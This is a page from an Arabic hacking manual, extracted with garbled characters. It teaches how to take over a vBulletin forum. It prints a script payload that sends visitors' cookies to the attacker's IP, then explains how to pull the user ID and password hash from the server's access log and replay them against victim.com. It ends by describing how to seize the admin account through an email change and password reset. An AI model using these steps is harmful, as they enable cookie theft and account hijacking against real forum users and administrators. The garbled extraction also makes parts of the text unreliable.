Page 315 - بسم الله الرحمن الرحيم

P. 315

‫هذا الكود ‪:‬‬
‫>‪script>document.write('<img‬‬
‫‪<src="http://my_ip_address/'+document.cookie+'">';</script‬‬

‫مع ملحظة تصغير الـ ‪ IP Adress‬الى رقم الـ ‪ IP‬الخاص بك ‪.‬‬

‫وعندما يقو‪.‬م شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقو‪.‬م بتنفيذ الوامر في‬
‫جههاز وقراءة جهزء‬

‫من احد ملفات الكوكيز التي تصحتوي على الباسورد الخاصة بالمنتدى ‪ ..‬ثم يقو‪.‬م السكربت بتحويل هذه السطور‬
‫الى رقم‬

‫الي بي الذي قمنا بكتابته سابقا )مع ملحظة انه يجب ان يكون على جههازي سيرفر مثل ‪ IIS‬او ‪Apache‬‬
‫او غيرها ( ‪.‬‬

‫وبعد ان تصتم العملية بنجا ح قم بفتح ملف الـ ‪ Log‬الخاص بالسيرفر الذي يحتويه جههازك ‪..‬‬
‫مثال لو كان السيرفر اباتصشي ‪ ..‬فتا ح المجلد ‪ Apche‬واختتر ‪ logs‬واختتر ‪. Acces Log‬‬

‫ستجد جهميع الوامر التي طلبتها من السيرفر ‪ ..‬إلخ‬

‫ابحث عن الكود الخاص بالباسورد ‪ ..‬مثال ‪:‬‬

‫‪GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb‬‬

‫‪ddf90622;%20sessionhash=a‬‬
‫‪4719cd620534914930b86839c4bb5f8;%20bbthreadview[54‬‬

‫‪%20bblastvi;1012444064=[20‬‬
‫‪sit=1011983161‬‬

‫فكر قليل الن ‪ ..‬اين الباسورد ؟؟‬
‫الباسورد موجهودة لكن بطريقة مشفرة يصعب كسرها ‪ ..‬اذن مالحل ؟‬

‫قم بنسخ الكود الذي وجهدتصه والصقه في المتصفح ‪ ..‬بهذا الشكل‬
‫?‪http://www.victim.com/vb/index.php‬‬

‫‪[bbuserid=[userid]&bbpassword=[password hash‬‬
‫ستجد عبارة ‪ " :‬أهل بعودتصك يـا ) اسم الذي سرقت منه الكوكيز‪" (....‬‬

‫في هذه الحالة انت الن تصستطيع التحكم بكل شي وكانك مدير المنتدى )الذي سرقت منه الكوكيز( ‪..‬‬
‫لكننا نحتاج الى كلمة المرور للدختول الى لوحة التحكم ‪ ..‬اذهب الى )التحكم( وقم بتعديل البريد اللكتروني الى‬

‫بريدك الخاص‬
‫وثم قم بتسجيل الخروج ‪ ..‬ثم اذهب الى اداة ‪ .. Forgot Password‬وعندها تصستطيع استقبال بريد‬

‫يحتوي باسورد الدمن ‪..‬‬

‫*******************‬

‫‪ 3‬أختتراق الــــ ‪SQL‬‬

‫يمكنك استخدا‪.‬م برنامج العقرب بيكون اسرع لمن لديه نسخ منه‬

‫س ‪:‬في البداية ماهي الس كيو ال ) ‪( SQL‬؟؟‬

‫‪315‬‬

310 311 312 313 314 315 316 317 318 319 320